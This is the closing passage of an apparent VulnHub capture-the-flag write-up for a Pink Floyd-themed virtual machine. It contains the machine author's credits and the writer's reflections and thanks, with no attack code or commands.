Richard Wright (RIP), and David Gilmour.
** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"
-=========================================-
- xerubus (@xerubus - www.mogozobo.com) -
-=========================================-
Conclusion
I really enjoyed this VM - not just because I'm a big fan of Pink Floyd, but also because of how it was laid out. The final step really did my head in. I spent days obsessing over how I could elevate my privileges, without read access to the final binary.
One lesson I'm taking away from this is, always double check your evidence. You never know when the last piece of the puzzle is sitting there in plain sight.
Thanks for the challenge Xerubus, and thank you for hosting it VulnHub!